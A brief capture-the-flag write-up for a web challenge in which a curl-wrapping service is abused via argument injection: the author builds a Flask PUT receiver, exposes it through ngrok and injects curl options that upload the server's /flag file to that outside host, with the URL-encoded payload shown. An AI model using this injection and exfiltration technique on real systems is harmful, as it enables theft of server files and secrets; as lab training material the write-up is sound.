CurlAsAService

CHALLENGE DESCRIPTION

cURL As A Service or CAAS is a brand new Alien application, built so that humans can test the status of their websites. However, it seems that the Aliens have not quite got the hang of Human programming and the application is riddled with issues.

I approached a black box testing on the challenge

Website

  • A simple curl request that will get the frontend src code

  • There are many ways to solve this challenge

  • I will make a flask app that handles put request and tell curl to put the file on my app

Flask app

from flask import Flask, request

app = Flask(__name__)

@app.route('/upload', methods=['PUT'])
def upload_file():
    uploaded_file = request.files['file']

    if uploaded_file:
        file_path = f"./uploads/{uploaded_file.filename}"
        uploaded_file.save(file_path)

        return f"File '{uploaded_file.filename}' uploaded successfully.\n"
    else:
        return "No file received in the request.\n", 400

if __name__ == '__main__':
    app.run(debug=False)

  • After this start ngrok on port 5000

  • run the app.py file

Payload

-X PUT -F "file=@/flag"  https://f9e2-122-177-22-17.ngrok-free.app/upload
  • breakdown:

    • -X PUT : this will tell curl what http method to use

    • -F "file=@/flag" : This will tell curl what file to upload (-F is basically to mention we are using file)

  • Turn on burspsuite and url encode the above payload

-X+PUT+-F+"file%3d%40/flag"++https%3a//f9e2-122-177-22-17.ngrok-free.app/upload

pwned

Last updated